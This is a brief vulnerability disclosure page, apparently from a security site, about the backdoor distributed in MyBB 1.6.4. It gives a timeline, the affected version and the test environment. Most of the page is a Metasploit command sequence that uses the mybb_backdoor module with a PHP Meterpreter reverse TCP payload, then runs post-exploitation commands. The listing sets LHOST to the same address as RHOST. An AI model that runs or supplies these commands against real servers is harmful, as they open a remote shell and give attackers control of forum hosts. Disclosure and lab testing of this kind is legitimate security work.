Timeline :

Vulnerability discovered by the vendor the 2011-10-06
Public release of the vulnerability the 2011-10-06
Metasploit PoC provided the 2011-10-08

PoC provided by :

tdz

Reference(s) :

SA46300

Affected version(s) :

MyBB 1.6.4 prior to October 6th, 2011 are vulnerable.

Tested on Ubuntu 10.04.3 LTS with :

MyBB 1.6.4

Description :

myBB is a popular open source PHP forum software. Version 1.6.4 contained an unauthorized backdoor, distributed as part of the vendor’s source package.

Commands :

use exploit/unix/webapp/mybb_backdoor
set RHOST 192.168.178.21
set VHOST blackbox.zataz.loc
set URI /mybb/index.php
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
sysinfo